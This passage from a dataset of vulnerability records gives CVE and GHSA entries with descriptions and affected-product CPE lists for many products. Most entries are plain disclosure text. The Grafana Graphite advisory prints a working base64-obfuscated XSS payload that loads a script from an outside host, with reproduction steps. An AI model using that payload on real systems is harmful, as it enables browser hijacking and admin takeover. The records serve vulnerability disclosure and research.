id
stringlengths
13
19
title
stringlengths
0
256
description
stringlengths
3
13.3k
cpes
listlengths
0
4.89k
CVE-2002-0545
Cisco Aironet before 11.21 with Telnet enabled allows remote attackers to cause a denial of service (reboot) via a series of login attempts with invalid usernames and passwords.
[ "cpe:2.3:h:cisco:aironet_ap340:*:*:*:*:*:*:*:*", "cpe:2.3:h:cisco:aironet_ap350:*:*:*:*:*:*:*:*", "cpe:2.3:h:cisco:aironet_ap350:11.21:*:*:*:*:*:*:*" ]
GHSA-qrfq-jhxg-f23h
Integer overflow in the dirapi.dll module in Adobe Shockwave Player before 11.5.9.620 allows attackers to execute arbitrary code via unspecified vectors.
[]
GHSA-jpw9-fm6r-w3ph
Inappropriate implementation in WebAuthentication in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
[]
GHSA-48c6-58v7-72hf
SQL injection vulnerability in listtest.php in YourFreeWorld Apartment Search Script allows remote attackers to execute arbitrary SQL commands via the r parameter.
[]
GHSA-qj3p-g2m7-rx94
An attacker could potentially exploit this vulnerability, leading to files being read from the Honeywell Experion ControlEdge VirtualUOC and ControlEdge UOC. This exploit could be used to read files from the controller that may expose limited information from the device. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.
[]
GHSA-wwhh-w44f-8x5c
TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the hostName parameter in the function setOpModeCfg.
[]
GHSA-w2j5-9hgq-p25f
SQL injection vulnerability in links/index.php in ATutor 1.5.3.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the (1) desc or (2) asc parameters.
[]
CVE-2020-14462
CALDERA 2.7.0 allows XSS via the Operation Name box.
[ "cpe:2.3:a:mitre:caldera:2.7.0:*:*:*:*:*:*:*" ]
GHSA-jc9g-p879-f3v9
Missing Authorization vulnerability in Peach Payments Peach Payments Gateway.This issue affects Peach Payments Gateway: from n/a through 3.1.9.
[]
GHSA-qvpj-hmr8-j79p
A vulnerability in the CLI of multiple Cisco Unified Communications products could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user.This vulnerability is due to improper validation of user-supplied command arguments. An attacker could exploit this vulnerability by executing crafted commands on the CLI of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user. To exploit this vulnerability, the attacker must have valid administrative credentials.
[]
CVE-2011-3619
The apparmor_setprocattr function in security/apparmor/lsm.c in the Linux kernel before 3.0 does not properly handle invalid parameters, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact by writing to a /proc/#####/attr/current file.
[ "cpe:2.3:o:linux:linux_kernel:*:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*" ]
GHSA-5h26-c766-g93v
Cross-Site Scripting
A reflected Cross-Site Scripting (XSS) flaw was found in RESTEasy in all versions of RESTEasy up to 4.6.0.Final, where it did not properly handle URL encoding when calling @javax.ws.rs.PathParam without any @Produces MediaType. This flaw allows an attacker to launch a reflected XSS attack. The highest threat from this vulnerability is to data confidentiality and integrity.
[]
GHSA-xv86-gr62-vcj7
This vulnerability involves command injection in tcpdump within Moxa products, enabling an authenticated attacker with console access to exploit improper input validation to inject and execute systems commands. Successful exploitation could result in privilege escalation, allowing the attacker to gain root shell access and maintain persistent control over the device, potentially disrupting network services and affecting the availability of downstream systems that rely on its connectivity.
[]
GHSA-xf27-jqwv-gf3r
Unintended Require in larvitbase-api
Versions of `larvitbase-api` prior to 0.5.4 are vulnerable to an Unintended Require. The package exposes an API endpoint and passes a GET parameter unsanitized to an `require()` call. This allows attackers to execute any `.js` file in the same folder as the server is running.RecommendationUpgrade to version 0.5.4 or later.
[]
GHSA-hcw5-6455-h9xm
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264445 was assigned to this vulnerability.
[]
CVE-2014-2867
Unrestricted file upload vulnerability in PaperThin CommonSpot before 7.0.2 and 8.x before 8.0.3 allows remote attackers to execute arbitrary code by uploading a ColdFusion page, and then accessing it via unspecified vectors.
[ "cpe:2.3:a:paperthin:commonspot_content_server:*:*:*:*:*:*:*:*", "cpe:2.3:a:paperthin:commonspot_content_server:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:paperthin:commonspot_content_server:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:paperthin:commonspot_content_server:8.0.2:*:*:*:*:*:*:*" ]
CVE-2006-0776
Cross-site scripting (XSS) vulnerability in guestex.pl in Teca Scripts Guestex 1.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[ "cpe:2.3:a:teca_scripts:guestex:1.0:*:*:*:*:*:*:*" ]
CVE-2015-0121
IBM Rational Requirements Composer 3.0 through 3.0.1.6 and 4.0 through 4.0.7 and Rational DOORS Next Generation (RDNG) 4.0 through 4.0.7 and 5.0 through 5.0.2, when LTPA single sign on is used with WebSphere Application Server, do not terminate a Requirements Management (RM) session upon LTPA token expiration, which allows remote attackers to obtain access by leveraging an unattended workstation.
[ "cpe:2.3:a:ibm:rational_requirements_composer:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:3.0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_requirements_composer:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_doors_next_generation:5.0.2:*:*:*:*:*:*:*" ]
CVE-2024-43438
Moodle: idor in feedback non-respondents report allows messaging arbitrary site users
A flaw was found in Feedback. Bulk messaging in the activity's non-respondents report did not verify message recipients belonging to the set of users returned by the report.
[ "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*" ]
GHSA-h594-v489-8m9p
An issue was discovered in Fujitsu Software Infrastructure Manager (ISM) before 2.8.0.061. The ismsnap component (in this specific case at /var/log/fujitsu/ServerViewSuite/ism/FirmwareManagement/FirmwareManagement.log) allows insecure collection and storage of authorization credentials in cleartext. That occurs when users perform any ISM Firmware Repository Address setup test (Test the Connection), or regularly authorize against an already configured remote firmware repository site, as set up in ISM Firmware Repository Address. A privileged attacker is therefore able to potentially gather the associated ismsnap maintenance data, in the same manner as a trusted party allowed to export ismsnap data from ISM. The preconditions for an ISM installation to be generally vulnerable are that the Download Firmware (Firmware Repository Server) function is enabled and configured, and that the character \ (backslash) is used in a user credential (i.e., user/ID or password) of the remote proxy host / firmware repository server. NOTE: this may overlap CVE-2023-39379.
[]
CVE-2016-5147
Blink, as used in Google Chrome before 53.0.2785.89 on Windows and OS X and before 53.0.2785.92 on Linux, mishandles deferred page loads, which allows remote attackers to inject arbitrary web script or HTML via a crafted web site, aka "Universal XSS (UXSS)."
[ "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" ]
CVE-2022-26822
Windows DNS Server Remote Code Execution Vulnerability
Windows DNS Server Remote Code Execution Vulnerability
[ "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:standard:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*" ]
CVE-2006-0053
Imager (libimager-perl) before 0.50 allows user-assisted attackers to cause a denial of service (segmentation fault) by writing a 2- or 4-channel JPEG image (or a 2-channel TGA image) to a scalar, which triggers a NULL pointer dereference.
[ "cpe:2.3:a:tony_cook:imager:0.41:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.42:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.43:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.44_1:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.45:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.45_2:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.47:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.48:*:*:*:*:*:*:*", "cpe:2.3:a:tony_cook:imager:0.49:*:*:*:*:*:*:*" ]
GHSA-c6m5-fcv9-26fc
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method when processing AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-8164.
[]
CVE-2021-25958
Generation of Error Message Containing Sensitive Information in Apache OFBiz
In Apache Ofbiz, versions v17.12.01 to v17.12.07 implement a try catch exception to handle errors at multiple locations but leaks out sensitive table info which may aid the attacker for further recon. A user can register with a very long password, but when he tries to login with it an exception occurs.
[ "cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*" ]
CVE-2017-1000382
VIM version 8.0.1187 (and other versions most likely) ignores umask when creating a swap file ("[ORIGINAL_FILENAME].swp") resulting in files that may be world readable or otherwise accessible in ways not intended by the user running the vi binary.
[ "cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*" ]
GHSA-3f33-r945-2gv6
The nlm_swap_auxiliary_headers_in function in bfd/nlmcode.h in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29 and earlier, allows remote attackers to cause an out of bounds heap read via a crafted nlm file.
[]
GHSA-qrrg-gw7w-vp76
Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip
SummaryWhen a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.DetailsSpin up your own Graphite instance. I've done this using the `make devenv sources=graphite`.Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py`Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>`The result would look like this:Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)Now login to your Grafana instance as an Organisation Admin.Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite data source`Add the url to the attackers Graphite instance (maybe enable `Skip TLS Verify`) and click `Save & test` and `Explore`In the newly opened page click the + icon next to `Functions` and search for `aggregateSeriesLists` and click it to add it.Now hover over `aggregateSeriesLists` with your mouse and move your mouse to the `?` icon.ResultOur payload will trigger and in this case it will include an external script to trigger the alerts.Decoded payload![image](https://user-images.githubusercontent.com/26874824/225035735-5d00e5d9-3302-4257-8f95-dd562e752893.png)ImpactIn the POC we've picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it's descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.An example would be something like this:MitigationThe vulnerability seems to occur in the following file: public\app\plugins\datasource\graphite\components\FunctionEditorControls.tsxIn many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.
[]
CVE-2015-6780
Use-after-free vulnerability in the Infobars implementation in Google Chrome before 47.0.2526.73 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site, related to browser/ui/views/website_settings/website_settings_popup_view.cc.
[ "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" ]
GHSA-ph8f-6r9j-mxq2
The RTI INDIA (aka com.vbulletin.build_890) application 3.8.21 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
[]
GHSA-fp5m-f325-vm83
ApiParse in MediaWiki before 1.23.15, 1.26.x before 1.26.4, and 1.27.x before 1.27.1 allows remote attackers to bypass intended per-title read restrictions via a parse action to api.php.
[]
GHSA-524x-cvp6-cq3m
An information disclosure vulnerability in the Qualcomm camera driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32720522. References: QC-CR#1090007.
[]
GHSA-jc53-j68w-grxm
A vulnerability, which was classified as critical, was found in MonikaBrzica scm. This affects an unknown part of the file uredi_korisnika.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213699.
[]
CVE-2008-1868
admin/sauvBase.php in Blog Pixel Motion (aka Blog PixelMotion) does not require authentication, which allows remote attackers to trigger a database backup dump, and obtain the resulting blogPM.sql file that contains sensitive information.
[ "cpe:2.3:a:pixel_motion:pixel_motion_blog:*:*:*:*:*:*:*:*" ]
GHSA-4j55-qh92-5qjq
In Pulp before version 2.16.2, secrets are passed into override_config when triggering a task and then become readable to all users with read access on the distributor/importer. An attacker with API access can then view these secrets.
[]
GHSA-mw3q-2xf6-36xq
Stack-based buffer overflow in epan/dissectors/packet-catapult-dct2000.c in the Catapult DCT2000 dissector in Wireshark 2.x before 2.0.6 allows remote attackers to cause a denial of service (application crash) via a crafted packet.
[]
GHSA-qxf4-6479-8vm5
Weborf HTTP Server 0.12.1 and earlier allows remote attackers to cause a denial of service (crash) via Unicode characters in a Connection HTTP header, and possibly other headers.
[]
CVE-2007-4985
ImageMagick before 6.3.5-9 allows context-dependent attackers to cause a denial of service via a crafted image file that triggers (1) an infinite loop in the ReadDCMImage function, related to ReadBlobByte function calls; or (2) an infinite loop in the ReadXCFImage function, related to ReadBlobMSBLong function calls.
[ "cpe:2.3:a:imagemagick:imagemagick:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.4.8.2_1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.3_.2_1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.6.0_20030409:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:5.5.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.2.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.3_3:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.3_5:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.3_6:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.3.4:*:*:*:*:*:*:*" ]
CVE-2002-0428
Check Point FireWall-1 SecuRemote/SecuClient 4.0 and 4.1 allows clients to bypass the "authentication timeout" by modifying the to_expire or expire values in the client's users.C configuration file.
[ "cpe:2.3:a:checkpoint:check_point_vpn:1_4.1:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:check_point_vpn:1_4.1_sp1:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:check_point_vpn:1_4.1_sp2:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:check_point_vpn:1_4.1_sp3:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:check_point_vpn:1_4.1_sp4:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp5:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp6:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp7:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.0:sp8:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:sp1:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:sp2:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:sp3:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:sp4:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:firewall-1:4.1:sp5:*:*:*:*:*:*", "cpe:2.3:a:checkpoint:next_generation:*:*:*:*:*:*:*:*" ]
GHSA-7mxx-rmjg-w89q
Possible null pointer dereference in thread cache operation handler due to lack of validation of user provided input in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
[]
GHSA-997f-cqvq-8grc
A SQL Injection issue in Merchandise Online Store v.1.0 allows an attacker to log in to the admin account.
[]
GHSA-fjhh-g4rq-8cqx
Integer underflow in the HTMLFormElement::removeFormElement function in html/HTMLFormElement.cpp in WebCore in WebKit in Google Chrome before 11.0.696.65 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted HTML document containing a FORM element.
[]
GHSA-6f3j-w26r-xhr6
SQL injection vulnerability in jokes.php in YourFreeWorld Jokes Site Script allows remote attackers to execute arbitrary SQL commands via the catagorie parameter.
[]
CVE-2017-17515
etc/ObjectList in Metview 4.7.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has indicated that the code to access this environment variable is not enabled in the shipped product
[ "cpe:2.3:a:ecmwf:metview:4.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" ]
GHSA-2qff-fp25-r737
AdMan 1.0.20051221 and earlier allows remote attackers to obtain the full path via (1) a blank campaignId parameter to editCampaign.php and (2) a blank schemeId parameter to viewPricingScheme.php.
[]
GHSA-h8mj-hhrj-rvh6
In WebKitGTK before 2.32.4, there is a use-after-free in WebCore::Frame::page, a different vulnerability than CVE-2021-30889.
[]
CVE-2024-20674
Windows Kerberos Security Feature Bypass Vulnerability
Windows Kerberos Security Feature Bypass Vulnerability
[ "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*" ]
CVE-2021-46740
The device authentication service module has a defect vulnerability introduced in the design process.Successful exploitation of this vulnerability may affect data confidentiality.
[ "cpe:2.3:o:huawei:emui:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:huawei:harmonyos:2.0:*:*:*:*:*:*:*" ]
GHSA-p49m-w88c-9w8j
Missing Authorization vulnerability in Copy Content Protection Team Secure Copy Content Protection and Content Locking.This issue affects Secure Copy Content Protection and Content Locking: from n/a through 3.7.1.
[]
CVE-2022-33065
Multiple signed integers overflow in function au_read_header in src/au.c and in functions mat4_open and mat4_read_header in src/mat4.c in Libsndfile, allows an attacker to cause Denial of Service or other unspecified impacts.
[ "cpe:2.3:a:libsndfile_project:libsndfile:-:*:*:*:*:*:*:*" ]
GHSA-q7m3-3wx5-c69v
MetInfo 6.1.3 has XSS via the admin/index.php?a=dogetpassword abt_type parameter.
[]
CVE-2020-25879
A stored cross site scripting (XSS) vulnerability in the 'Manage Users' feature of Codoforum v5.0.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Username' parameter.
[ "cpe:2.3:a:codologic:codoforum:5.0.2:*:*:*:*:*:*:*" ]
GHSA-6pvw-f57p-4vww
